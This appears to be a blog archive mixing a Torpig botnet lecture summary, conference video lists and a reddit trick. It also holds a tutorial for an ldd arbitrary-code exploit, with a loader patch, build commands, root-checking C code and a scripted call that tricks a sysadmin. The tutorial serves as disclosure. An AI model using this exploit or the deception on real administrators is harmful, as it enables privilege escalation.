I recently watched an interesting video lecture on stealing botnets. A group of researchers at UCSB recently managed to take control over a part of Torpig botnet for 10 days. During this time, they observed 180 thousand infections and recorded almost 70GB of data that bots collected. This data included submitted form information from all the websites the infected person had visited, smtp, ftp, pop3, windows, passwords, credit card numbers and passwords from various password managers.

Here are the most interesting facts from the lecture:

Torpig uses a technique called “domain fluxing” to avoid being shut down by simply blocking the IP or the domain name of control center servers. The idea is simple - depending on date and time the algorithm generates a domain name to connect to. If the domain gets shut down, the bots will simply use a different domain after some time.

The researchers were able to take control over a part of the botnet by cracking the domain name generating algorithm and registering some of the domain names to be used for communication in the future.

The bad guys noticed that a part of botnet has been taken over and issued a software update to all bots to use a new domain flux algorithm, which used Twitter’s popular topics for the day to generate domain names. It was no longer possible to predict the domain that would be used tomorrow.

When communicating with command & control server, the bots included a unique id field that was generated from machine’s hardware. This allowed researchers to estimate the real number of unique computers infected. Researchers saw 1.2 million unique IP addresses but only 180k unique machines.

The bots would steal financial data from 410 financial institutions (top 5: PayPal, Poste Italiane, Capital One, E*Trade, Chase), they would log credit card information (top 5 cards: Visa, Mastercard, American Express, Maestro, Discover), and they would also steal all the passwords from browser’s password manager.

In a 2008 study Symantec estimated that credit card information is valued at $.10 to $25 per card in the underground market. The bank account information is valued at $10.00 to $1,000 per account. Using this study, researchers estimated that during 10 day period the amount of financial data bots collected were worth $83k to $8.3 million.

Using various estimations researchers calculated that if the bots are used for denial of service the total bandwidth would be 17Gbps.

Researchers observed that there was a fraction of people who’d fill out the phishing page and then immediately email the company’s security group telling that they may have been victims of identity theft.

Since Torpig was sending all the HTTP POST data and emails to command & control servers, researchers did statistics on emails and found out that 14% of all captured emails were about jobs and resumes, 10% discussed computer security/malware, 7% discussed money, 6% were sports fans, 5% were worried about exams and their grades, 4% were seeking partners online.

Researchers collected 300,000 unique credentials on 370,000 websites. 28% of people reused their password on multiple domains. There were 173,686 unique passwords.

Researchers converted the passwords in Unix format and tried to crack them with John the Ripper. 56,000 were cracked in less than 65 minutes using brute-force. Using a wordlist 14,000 passwords were cracked in the next 10 minutes. And another 30,000 passwords were cracked in the next 24 hours. That’s 58% of all passwords cracked in 24 hours.

You’re welcome to watch the video lecture. It’s 1h 15m long. It’s presented by Richard A. Kemmerer.

Here are all the topics in the lecture:

• [02:00] Botnet terminology - bot, botnet, command & control server, control channel, botmaster.
• [03:00] Introduction to the Torpig trojan and Mebroot malware platform.
• [05:00] How Torpig works.
• [11:30] Torpig HTML injection.
• [15:00] Domain fluxing.
• [19:15] Taking over Torpig’s c&c server.
• [24:10] Data collection principles.
• [26:00] C&c server protocol.
• [31:10] Botnet’s size estimation.
• [37:00] Botnet’s threats: theft of financial information, denial of service, proxy servers, privacy thefts.
• [37:30] Threat: Theft of financial information.
• [42:00] Threat: Denial of service.
• [43:30] Threat: Proxy servers.
• [44:20] Threat: Privacy theft.
• [47:00] Password analysis.
• [50:40] Criminal retribution.
• [53:00] Law enforcement.
• [58:00] Repatriating the data.
• [01:00:00] Ethics.
• [01:02:00] Conclusions.
• [01:06:00] Questions and answers.

For more information see the publication “Your Botnet is My Botnet: Analaysis of a Botnet Takeover.”

The `ldd` utility is more vulnerable than you think. It’s frequently used by programmers and system administrators to determine the dynamic library dependencies of executables. Sounds pretty innocent, right? Wrong!

In this article I am going to show you how to create an executable that runs arbitrary code if it’s examined by `ldd`. I have also written a social engineering scenario on how you can get your sysadmin to unknowingly hand you his privileges.

I researched this subject thoroughly and found that it’s almost completely undocumented. I have no idea how this could have gone unnoticed for such a long time. Here are the only few documents that mention this interesting behavior: 1, 2, 3, 4.

First let’s understand how `ldd` works. Take a look at these three examples:

[1] $ ldd /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7eca000)
        /lib/ld-linux.so.2 (0xb801e000)

[2] $ LD_TRACE_LOADED_OBJECTS=1 /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7e30000)
        /lib/ld-linux.so.2 (0xb7f84000)

[3] $ LD_TRACE_LOADED_OBJECTS=1 /lib/ld-linux.so.2 /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7f7c000)
        /lib/ld-linux.so.2 (0xb80d0000)

The first command [1] runs `ldd` on `/bin/grep`. The output is what we expect — a list of dynamic libraries that `/bin/grep` depends on.

The second command [2] sets the LD_TRACE_LOADED_OBJECTS environment variable and seemingly executes `/bin/grep` (but not quite). Surprisingly the output is the same!

The third command [3] again sets the LD_TRACE_LOADED_OBJECTS environment variable, calls the dynamic linker/loader `ld-linux.so` and passes `/bin/grep` to it as an argument. The output is again the same!

What’s going on here?

It turns out that `ldd` is nothing more than a wrapper around the 2nd and 3rd command. In the 2nd and 3rd example `/bin/grep` was never run. That’s a peculiarity of the GNU dynamic loader. If it notices the LD_TRACE_LOADED_OBJECTS environment variable, it never executes the program, it outputs the list of dynamic library dependencies and quits. (On BSD `ldd` is a C program that does the same.)

If you are on Linux, take a look at the `ldd` executable. You’ll find that it’s actually a bash script. If you step through it very carefully, you’ll notice that the 2nd command gets executed if the program specified to `ldd` can’t be loaded by the `ld-linux.so` loader, and that the 3rd command gets executed if it can.

One particular case when a program won’t be handled by `ld-linux.so` is when it has a different loader than the system’s default specified in it’s .interp ELF section. That’s the whole idea in executing arbitrary code with `ldd` — load the executable via a different loader that does not handle LD_TRACE_LOADED_OBJECTS environment variable but instead executes the program.

For example, you can put a malicious executable in ~/app/bin/exec and have it loaded by ~/app/lib/loader.so. If someone does `ldd /home/you/app/bin/exec` then it’s game over for them. They just ran the nasty code you had put in your executable. You can do some social engineering to get the sysadmin to execute `ldd` on your executable allowing you to gain the control over the box.

Compiling the new loader.

Get the uClibc C library. It has pretty code and can be easily patched to bypass the LD_TRACE_LOADED_OBJECTS checks.

$ mkdir app
$ cd app
app$ wget 'http://www.uclibc.org/downloads/uClibc-0.9.30.1.tar.bz2'

Unpack it and run `make menuconfig`, choose the target architecture (most likely i386), leave everything else unchanged.

app$ bunzip2 < uClibc-0.9.30.1.tar.bz2 | tar -vx
app$ rm -rf uClibc-0.9.30.1.tar.bz2
app$ cd uClibc-0.9.30.1
app/uClibc-0.9.30.1$ make menuconfig

Edit .config and set the destination install directory to `/home/you/app/uclibc`.

# change these two lines
RUNTIME_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/"
DEVEL_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/usr/"

# to this
RUNTIME_PREFIX="/home/you/app/uclibc/"
DEVEL_PREFIX="/home/you/app/uclibc/usr/"

Now we’ll need to patch it to bypass LD_TRACE_LOADED_OBJECTS check.

Here is the patch. It patches the `ldso/ldso/ldso.c` file. Save the patch to a file and run `patch -p0 < file`. If you don't do it, arbitrary code execution won't work, because it will think that `ldd` wants to list dependencies.

--- ldso/ldso/ldso-orig.c       2009-10-25 00:27:12.000000000 +0300
+++ ldso/ldso/ldso.c    2009-10-25 00:27:22.000000000 +0300
@@ -404,9 +404,11 @@
        }
 #endif

+    /*
        if (_dl_getenv("LD_TRACE_LOADED_OBJECTS", envp) != NULL) {
                trace_loaded_objects++;
        }
+    */

 #ifndef __LDSO_LDD_SUPPORT__
        if (trace_loaded_objects) {

Now compile and install it.

app/uClibc-0.9.30.1$ make -j 4
app/uClibc-0.9.30.1$ make install

This will install the uClibc loader and libc library to /home/you/app/uclibc.

That’s it. We have now installed uClibc. All we have to do now is link our executable with uClibc’s loader (app/lib/ld-uClibc.so.0). It will execute the code if run under `ldd`!

Creating and linking an executable with uClibc’s loader.

First let’s create a test application that will just print something when executed via `ldd` and let’s put it in `app/bin/myapp`

app/uClibc-0.9.30.1$ cd ..
app$ mkdir bin
app$ cd bin
app/bin$ vim myapp.c

Let’s write the following in `myapp.c`.

#include <stdio.h>
#include <stdlib.h>

int main() {
  if (getenv("LD_TRACE_LOADED_OBJECTS")) {
    printf("All your box are belong to me.\n");
  }
  else {
    printf("Nothing.\n");
  }
  return 0;
}

This is the most basic code. It checks if LD_TRACE_LOADED_OBJECTS env variable is set or not. If the variable set, the program acts maliciously but if it’s not, the program acts as if nothing happened.

The compilation is somewhat complicated because we have to link with the new C library statically (because anyone who might execute our program via `ldd` will not have our new C library in their LD_LIBRARY_PATH) and specify the new loader:

app/bin$ L=/home/you/app/uclibc
app/bin$ gcc -Wl,--dynamic-linker,$L/lib/ld-uClibc.so.0 \
    -Wl,-rpath-link,$L/lib \
    -nostdlib \
    myapp.c -o myapp \
    $L/usr/lib/crt*.o \
    -L$L/usr/lib/ \
    -lc

Here is the explanation of options passed to gcc:

• -Wl,--dynamic-linker,$L/lib/ld-uClibc.so.0 — specifies the new loader,
• -Wl,-rpath-link,$L/lib — specifies the primary directory where the dynamic loader will look for dependencies,
• -nostdlib — don’t use system libraries,
• myapp.c -o myapp — compile myapp.c to executable myapp,
• $L/usr/lib/crt*.o — statically link to initial runtime code, function prolog, epilog,
• -L$L/usr/lib/ — search for libc in this directory,
• -lc — link with the C library.

Now let’s run the new `myapp` executable. First, without ldd:

app/bin$ ./myapp
Nothing.

LD_TRACE_LOADED_OBJECTS environment variable was not set and the program output “Nothing.” as expected.

Now let’s run it via `ldd` and for the maximum effect, let’s run it from the root shell, as if I was the sysadmin:

app/bin$ su
Password:
app/bin# ldd ./myapp
All your box are belong to me.

Wow! The sysadmin just executed our exploit! He lost the system.

A more sophisticated example.

Here is a more sophisticated example that I just came up with. When run without `ldd` this application fails with a fictitious “error while loading shared libraries” error. When run under `ldd` it checks if the person is root, and owns the box. After that it fakes `ldd` output and pretends to have `libat.so.0` missing.

This code needs a lot of improvements and just illustrates the main ideas.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/*
This example pretends to have a fictitious library 'libat.so.0' missing.
When someone with root permissions runs `ldd this_program`, it does
something nasty in malicious() function.

I haven't implemented anything malicious but have written down some ideas
of what could be done.

This is, of course, a joke program. To make it look more real, you'd have
to bump its size, add some more dependencies, simulate trying to open the
missing library, detect if ran under debugger or strace and do absolutely
nothing suspicious, etc.
*/

void pretend_as_ldd()
{
    printf("\tlinux-gate.so.1 =>  (0xffffe000)\n");
    printf("\tlibat.so.0 => not found\n");
    printf("\tlibc.so.6 => /lib/libc.so.6 (0xb7ec3000)\n");
    printf("\t/lib/ld-linux.so.2 (0xb8017000)\n");
}

void malicious()
{
    if (geteuid() == 0) {
        /* we are root ... */
        printf("poof, all your box are belong to us\n");

        /* silently add a new user to /etc/passwd, */
        /* or create a suid=0 program that you can later execute, */
        /* or do something really nasty */
    }
}

int main(int argc, char **argv)
{
    if (getenv("LD_TRACE_LOADED_OBJECTS")) {
        malicious();
        pretend_as_ldd();
        return 0;
    }

    printf("%s: error while loading shared libraries: libat.so.0: "
           "cannot open shared object file: No such file or directory\n",
           argv[0]);
    return 127;
}

Actually you can put the code you want to get executed right in the loader itself. This way the executable will always look clean.

Social engineering.

Most system administrators probably don’t know that they should never run `ldd` on unfamiliar executables.

Here is a fake scenario on how to get your sysadmin run `ldd` on your executable.

Sysadmin’s phone: ring, ring.

Sysadmin: “Mr. sysadmin here. How can I help you?”

You: “Hi. An app that I have been using has started misbehaving. I am getting weird dependency errors. Could you see what is wrong?”

Sysadmin: “Sure. What app is it?”

You: “It’s in my home directory, /home/carl/app/bin/myapp. Sometimes when I run it, it says something about ‘error while loading shared libraries’.”

Sysadmin: “Just a sec.” noise from keyboard in the background

Sysadmin: “What was it again? It must be some kind of a library problem. I am going to check its dependencies.”

You: “Thanks, it’s /home/carl/app/bin/myapp.”

Sysadmin: “Hmm. It says it’s missing `libat.so.0`, ever heard of it?”

You: “Nope, no idea… I really need to get my work done, can you check on that and get back to me?” evil grin in the background

Sysadmin: “Okay Carl, I’m gonna call you back.”

You: “Thanks! See ya.”

You: `mv ~/.hidden/working_app ~/app/bin/myapp`.

After a while.

Sysadmin calls: “Hi. It seems to be working now. I don’t know what the problem was.”

You: “Oh, okay. Thanks!”

Lesson to be learned: Never run `ldd` on unknown executables!

P.S. If you enjoyed this article subscribe to my future posts! I have many more quality articles coming.

Here are more hacker videos (previous post was on Defcon videos). This time they are from Shmoocon hacker conference. They put out videos from 2006, 2007 and they are putting out videos from 2008 pretty soon.

Shmoocon, as they describe themselves, is an annual East coast hacker convention hell-bent on offering three days of an interesting atmosphere for demonstrating technology exploitation, inventive software & hardware solutions, and open discussions of critical infosec issues.

Here are the videos from Shmoocon 2006:

• Behavioral Malware Analysis Using Sandnets by Joe Stewart
• Asterisk: VoIP for the Masses by Damin [presentation]
• Black Ops Of TCP/IP 2005.5 by Dan Kaminsky
• Breaking LanMan Forever by Dan Moniz and Patrick Stach
• Covert Crawling: a wolf among lambs by Acidus
• The Church of Wi-Fi presents: An Evil Bastard, A Rainbow and a Great Dane! by Renderman, Thorn, Dutch, and Joshua Wright [presentation and coWPAtty tool]
• Network Policy Enforcement / Network Quarantine - Latest Security Gimmick or Good Idea? by Steve Manzuik
• Responding to Responsible (or Not) Disclosure by Jon Callas and Special Guests
• ConCon: A History of Hacker Conferences by Jason Scott
• Advanced Network Reconnaissance with Nmap by Fyodor
• FreeBSD jail(8), A Secure Virtual Machine by Ike
• Do it yourself: Building an Enterprise Class Surveillance System by Joel Wilbanks [presentation]
• Advances in Single Packet Authorization by Michael Rash [presentation, and fwknop tool]
• Network Security Monitoring with Sguil by Richard Bejtlich and David Bianco [presentation]
• Countering Attacks at Layer 2 by Eric Smith [presentation]
• “Hacking the Friendly Skies” by Simple Nomad [presentation]
• A Young Gentleman’s Primer on the Reading and Emulation of Magnetic Cards by Abend
• Anonym.OS: Security and Privacy, Everywhere You Go by dr.kaos, digunix, atlas and beth
• Bitchslapping Wireless IDS/IPS appliances by Eldon Sprickerhoff [presentation]
• Web Application Vulnerabilities and Exploits by Matt Fisher [presentation]
• Wi-Fi trickery, or how to secure, break and have fun with Wi-Fi by Laurent Butti and Franck Veysset [presentation]
• Kryptos and the Cyrillic Projector Ciphers by Elonka Dunin
• Reverse Engineering for Fun and BoF It! - 2006 by Pedram Amini, Chris Eagle [presentation]
• Trojans and Botnets and Malware, Oh My! by Lance James [presentation]
• Snort BoF by Cazz
• Windows Vista Heap by Adrian Marinescu
• Outbound Content Compliance by Jim Noble [presentation]
• Lockpicking and Physical Security Fundamentals by Deviant Ollam
• j0hnny’s Greatest Hits: The Best of Johnny Long by Johnny Long
• Securing Civil Liberties - Or Why Hackers Should Run the Government by Jennifer Granick

Here are the videos from Shmoocon 2007:

• Hacking the Airwaves with FPGA’s by H1kari
• Auditing Cached Credentials with Cachedump by Eoin Miller and Adair Collins
• Security Breaches are Good for You by Adam Shostack
• No-Tech Hacking by Johnny Long
• Boomstick-Fu: The Fundamentals of Physical Security at its Most Basic Level by Deviant Ollam, Noid and Thorn
• Hacker Potpourri by Simple Nomad
• Extend your Code into the Real World by Ryan Clarke
• Weaponizing Noam Chomsky, or Hacking with Pattern Languages by Dan Kaminsky
• Bypassing NAC Systems by Ofir Arkin [presentation]
• Web Application Incident Preparation by Matt Fisher, Cygnus and PresMike
• JavaScript Malware for a Grey Goo Tomorrow by Billy Hoffman
• Backbone Fuzzing by Raven
• Windows Mobile Software: Raw and Exposed by Seth Fogie [presentation]
• Hacking Disposable Digital Cameras by John Maushammer
• WPAD: Proxy Attack by Chris Paget
• Vulnerability Disclosure Panel Palaver (or 0-day: OK, No Way, or For Pay) by Katie Moussouris
• A Hacker Looks at 50 by G. Mark Hardy [presentation]
• The Church of WiFi presents: A Hacker in Iraq by Michael Schearer [presentation]
• Wireless (and Wired) Networks @ Security Cons by Luiz Eduardo
• The Hacker Foundation: The Ethic in Action by Jesse Krembs and Nick Farr
• Dissecting ShmooCon Labs by The Shmoo Group
• VOIP, Vonage, and Why I Hate Asterisk by Joel Bruno and Eric Smith
• Attack Detection and Response with Linux Firewalls by Michael Rash [presentation]
• Assess the Security of Your Online Bank (Without Going to Jail) by Chuck Willis
• RFIDiots by Major Malfunction
• Encrypted Protocol Identification via Statistical Analysis by Rob King and Rohlt Dhamankar [presentation]
• Three Crypto Geeks on the Current State of Cryptography and the Internet by Rodney Thayer, Jon Callas and Ben Laurie
• Standard Bodies - What are these Guys Drinking? by Al Potter, Renderman, and Russ Housley
• 0wn the Con by The Shmoo Group

Here are the videos from Shmoocon 2008:

• 21st Century Shellcode for Solaris by Tim Vidas [presentation]
• Advanced Protocol Fuzzying - What We Learned When Bringing Layer2 Logic to SPIKE Land by Enno Rey and Daniel Mende
• Baked not Fried Performing an Unauthorized Phishing Awareness Exercise by Syn Phishus [presentation]
• Forced Internet Condom by Aaron Higbee and Jaime Fuentes [presentation]
• Forensic Image Analysis to Recover Passwords by David Smith [presentation]
• Got Citrix Hack It! by Shanit Gupta [presentation]
• Hacking Windows Vista Security by Dan Griffin [presentation]
• Hacking the Samurai Spirit by Isaac Mathis [presentation]
• How do I Pwn Thee Let Me Count the Ways by RenderMan
• Intercepting Mobile PhoneGSM Traffic by H1kari
• Electronic Voting - Risks and Opportunities by Alex Halberman
• Legal Issues for Bot-net Researchers and Mitigators by Alexander Muentz [presentation]
• Malware Software Armoring Circumvention by Danny Quist [presentation]
• PEAP Pwned Extensible Authentication Protocol by Josh Wright and Brad Antoniewicz [presentation]
• Path X Explosive Security Testing Tools using XPath by Andre Gironda, Marcin Wielgoszewski and Tom Stracener [presentation]
• Practical Hacker Crypto by Simple Nomad
• SIPing Your Network by Radu State, Humberto Abdelnur, and Olivier Festor [presentation]
• TL1 Device Security by Rachel Bicknell
• The Geek and the Gumshoe or Can Mathematics and Computers Really Solve Crimes by Michael Schearer and Frank [presentation]
• They’re Hacking Our Clients! Why are We Focusing Only on the Servers by Jay Beale [presentation]
• Using Aspect Oriented Programming to Prevent Application Attacks by Rohit Sethi and Nish Bhalla [presentation]
• Virtual Worlds by Charlie Miller and Dino Dai Zovi [presentation]
• VoIP Penetration Testing Lessons Learned by John Kindervag and Jason Ostrom [presentation]
• Web Portals Gateway to Information or a Hole in our Perimeter Defenses by Deral Heiland [presentation]
• When Lawyers Attack! Dealing with the New Rules of Electronic Discovery by John Benson, Esq [presentation]
• Why are Databases so Hard to Secure by Sheeri Cabral [presentation]
• On the Social Responsibility of Hackers Panel by Bruce Potter (moderator), Simple Nomad, Johnny Long, Rick Dakan [info on panel]

Enjoy and don’t forget to comment on which videos you liked the best!

Here is something for all you hackers out there reading my blog: all the videos from the previous year’s biggest and greatest hacker conference — DefCon 15!

I found these videos via this post on Roy/SAC’s blog. He bought a full set of DVDs for several hundred dollars and uploaded them to Google Video! I sincerely appreciate his effort!

Total of more than 200 videos!

For your convenience, here is the full DefCon 15 session listing:
Download Full DefCon 15 Session Listing (.pdf).

You’re welcome to comment here on lectures you found intriguing and liked the most!

• T101: Making of the DEFCON 15 Badges by Joe Grand
• T102: Q&A with Bruce by Bruce Schneier
• T103: Turn-Key Pen Test Labs by Thomas Wilhelm
• T104: How I Learned to Stop Fuzzing and Find More Bugs by Jacob west
• T105: Convert Debugging - Circumventing Software Armoring Techniques by Danny Quist & Valsmith
• T106: Functional Fuzzing with Funk by Benjamin Kurtz
• T107: Tactical Exploitation by H.D.Moore & Valsmith
• T108: Intelligent Debugging for vuln-dev by Damien Gomez
• T109: Fingerprinting and Cracking Java Obfuscated Code by Subere
• T110: Comparing Application Security Tools by Edward Lee
• T111: Meet the Feds (Panel Discussion)
• T112: No-Tech Hacking by Johnny Long
• T131: The SOA/XML Threat Model and New XML/SOA/Web 2.0 Attacks & Threats by Steve Orrin
• T133: Pen-testing Wi-Fi by Aaron Peterson
• T134: Hacking EVDO by King Tuna
• T135: Multipot - A More Potent Variant of Evil Twin by K.N.Gopinath
• T136: The Next Wireless Frontier - TV White Spaces by Doug Mohney
• T137: Creating Unreliable Systems - Attacking the Systems that Attack You by Sysmin & Marklar
• T138: GeoLocation of Wireless Access Points and “Wireless GeoCaching” by Ricky Hill
• T139: Being in the Know… Listening to and Understanding Modern Radio Systems by Brett Neilson
• T140: The Emperor Has No Cloak - Web Cloaking Exposed by Vivek Ramachandran
• T141: Hardware Hacking for Software Geeks by nosequitor & Ab3nd
• T142: The Church of WiFi Presents: Hacking Iraq by Michael Schearer
• T161: HoneyJax (aka Web Security Monitoring and Intelligence 2.0) by Dan Hubbard
• T162: Hacking Social Lives: MySpace.com by Rick Deacon
• T163: The Inherent Insecurity of Widgets and Gadgets by Aviv Raff & Iftach Ian Amit
• T164: Greater Than 1 - Defeating “Strong” Authentication in Web Applications (for Online Banking) by Brendan O’Connor.
• T165: Intranet Invasion With Anti-DNS Pinning by David Byrne
• T166: Biting the Hand that Feeds You - Storing and Serving Malicious Content From Well Known Web Servers by Billy Rios & Nathan McFeters
• T201: Church Of WiFi’s Wireless Extravaganza by Church of WiFi’s
• T202: SQL Injection and Out-of-Band Channeling by Patrik Karlsson
• T203: Z-Phone by Phillip Zimmermann
• T204: OpenBSD Remote Exploit and Another IPv6 Vulnerabilities by Alfredo Ortega
• T205: MQ Jumping by Martyn Ruks
• T206: Virtual World, Real Hacking by Greg Hoglund
• T207: It’s All About the Timing by Haroon Meer & Marco Slaviero
• T208: Revolutionizing the Field of Grey-box Attack Surface Testing with Evolutionary Fuzzing by Jared DeMott, Dr. Richard Enbody & Dr. Bill Punch
• T209: How Smart is Intelligent Fuzzing - or - How Stupid is Dumb Fuzzing? by Charlie Miller
• T210: INTERSTATE: A Stateful Protocol Fuzzer for SIP by Ian G. Harris
• T211: One Token to Rule Them All by Luke Jennings
• T212: Trojans - A Reality Check by Toralv Dirro & Dirk Kollberg
• T231: Multiplatform Malware Within the .NET-Framework by Paul Ziegler
• T232: Malware Secrets by Valsmith & Delchi
• T233: 44 Lines About 22 Things That Keep Me Up at Night by Agent X
• T234: Click Fraud Detection with Practical Memetrics by Broward Horne
• T235: Fighting Malware on your Own by Vitaliy Kamlyuk
• T236: Virtualization: Enough Holes to Work Vegas by D.J.Capelis
• T237: Homeless Vikings, (Short-Lived bgp Prefix Hijacking and the Spamwars) by Dave Josephsen
• T238: Webserver Botnets by Gadi Evron
• T239: The Commercial Malware Industry by Peter Gutmann
• T240: CaffeineMonkey - Automated Collection, Detection and Analysis of Malicious JavaScript by Daniel Peck & Ben Feinstein
• T241: Greetz from Room 101 by Kenneth Geers
• T242: Estonia and Information Warfare by Gadi Evron
• T261: The Completion Backward Principle by geoffrey
• T262: Boomstick Fu: The Fundamentals of Physical Security at its Most Basic Level by Deviant Ollam, Noid, Thorn, Jur1st
• T263: Locksport: An Emerging Subculture by Schuyler Towne
• T264: Satellite Imagery Analysis by Greg Conti
• T265: High Insecurity: Locks, Lies, and Liability by Marc Weber Tobias & Matt Fiddler
• T301: Analysing Intrusions & Intruders by Sean Bodmer
• T302: Aliens Cloned My Sheep by Major Malfunction
• T303: Breaking Forensics Software by Chris Palmer & Alex Stamos
• T304: Re-Animating Drives and Advanced Data Recovery by Scott Moulton
• T305: Cool Stuff Learned from Competing in the DC3 Digital Forensic Challenge by David C. Smith
• T306: Windows Vista Log Forensics by Rich Murphey
• T307: When Tapes Go Missing by Robert Stoudt
• T308: CiscoGate by The Dark Tangent
• T309: Hacking UFOlogy - Thirty Years in the Wilderness of Mirrors by Richard Thieme
• T311: Hack Your Car for Boost and Power! by Aaron Higbee
• T312: The Executable Image Exploit by Michael Schrenk
• T331: A Crazy Toaster: Can Home Devices Turn Against Us? by Dror Shalev
• T332: IPv6 is Bad for Your Privacy by Janne Lindqvist
• T333: Injecting RDS-TMC Traffic Information Signals a.k.a. How to freak out your Satellite Navigation by Andrea Barisani
• T335: Unraveling SCADA Protocols: Using Sulley Fuzzer by Ganesh Devarajan
• T336: Hacking the Extensible Firmware Interface by John Heasman
• T337: Hacking your Access Control Reader by Zac Franken
• T338: Security by Politics - Why it Will Never Work by Lukas Grunwald
• T339: Kernel Wars by Joel Eriksson, Karl Janmar, Claes Nyberg, Christer Öberg
• T340: (un)Smashing the Stack: Overflows, Counter-Measures, and the Real World by Shawn Moyer
• T341: Remedial Heap Overflows: dlmalloc styl by atlas
• T342: Thinking Outside the Console (box) by Squidly1
• T361: Hacking the EULA44 - Reverse Benchmarking Web Application Security Scanners by Tom Stracener & Marce Luck
• T362: Network Mathematics - Why is it a Small World? by Oskar Sandberg
• T363: Beyond Vulnerability Scanning - Extrusion and Exploitability Scanning by Matt Richard
• T364: LAN Protocol Attacks Part 1 - Arp Reloaded by Jesse D’Aguanno
• T365: Entropy-Based Data Organization Tricks for Log and Packet Capture Browsing by Sergey Bratus
• T366: Securing Linux Applications With AppArmor by Crispin Cowan
• T401: Disclosure and Intellectual Property Law - Case Studies by Jennifer Granick
• T402: Computer and Internet Security Law - A Year in Review 2006-2007 by Robert Clark
• T403: Picking up the Zero Day; An Everyones Guide to Unexpected Disclosures by Dead Addict
• T404: Everything you ever wanted to know about Police Procedure in 50 minutes by Steve Dunker
• T405: Bridging the Gap Between Technology and the Law by John Benson
• T406: Protecting Your IT Infrastructure From Legal Attacks - Subpoenas, Warrants and Transitive Trust by Alexander Muentz
• T407: Digital Rights Worldwide: Or How to Build a Global Hacker Conspiracy by Danny O’Brien
• T408: A Journalist’s Perspective on Security Research by Peter Berghammer
• T409: Teaching Hacking at College by Sam Bowne
• T410: Faster PwninG Assured: New adventures with FPGAs by David Hulton
• T411: Ask the EFF (Panel Discussion)
• T431: The Market for Malware by Thomas Holt
• T433: Routing in the Dark - Pitch Black by Nathan Evans & Christian Grothoff
• T434: Technical Changes Since You Last Heard About Tor by Nick Mathewson
• T435: Social Attacks on Anonymity Networks by Nick Mathewson
• T436: Tor and Blocking - Resistance by Roger Dingledine
• T438: Saving the Internet With Hate by Zed Shaw
• T439: Securing the Tor Network by Mike Perry
• T441: Portable Privacy by Steve Topletz
• T442: Real-time Steganography with RTP by |)ruid
• T501: Vulnerabilities and The Information Assurance Directorat by Tony Sager
• T502: Meet The VCs (Panel Discussion)
• T503: Anti Spyware Coalition (Panel Discussion)
• T504: Disclosure Panel (Panel Discussion)
• T505: Dirty Secrets of the Security Industry by Bruce Potter
• T506: Self Publishing in the Underground by Myles Long, Rob “Flack” O’Hara and Christian “RaD Man” Wirth
• T507: The Hacker Society Around the (Corporate) World by Luiz Eduardo
• T508: Creating and Managing Your Security Career by Mike Murray & Lee Kushner
• T509: kNAC! by Ofir Arkin
• T531: Hack Your Brain with Video Games by Ne0nRa1n & Joe Grant
• T532: How to be a WiFi Ninja by Pilgrim
• T534: The Science of Social Engineering: NLP, Hypnosis and the Science of Persuasion by Mike Murray & Anton Chuvakin
• T535: Black Ops 2007: Design Reviewing The Web by Dan Kaminsky
• T536: The Edge of Forever - Making Computer History by Jason Scott
• T538: Stealing Identity Management Systems by Plet
• T539: Internet Wars 2007 (Panel Discussion)

Have fun!

When I was developing the reddit media: intelligent fun online website, I needed to embed reddit’s up/down voting buttons to allow users to cast votes on media links directly from the site.

I remembered that reddit had decided not to display posts with a submission time less than two hours ago.

This left me thinking, if the scores are not displayed for new posts, what’s the point of having vote boxes on a just posted article page? I thought, it wouldn’t make sense if it wasn’t available. Quickly did I find a link on reddit’s new page which seemed to have received a few votes and added a reddit’s button to an empty HTML document.

A reddit voting button/widget can be embedded on a site by putting the following JavaScript code fragment anywhere in the HTML source:

<script>reddit_url='[URL]'</script>
<script>reddit_title='[TITLE]'</script>
<script language="javascript" src="http://reddit.com/button.js?t=2"></script>

where the URL is the URL to the article and TITLE is the title of the article.

Voilà! I now know something nobody else did - how many votes had the post received!

NOW, let’s create something cool for general public to use so that anyone could reveal the scores for all recently posted links :)

Continue reading ‘Revealing Reddit Score for Just Posted Links with FireFox and GreaseMonkey’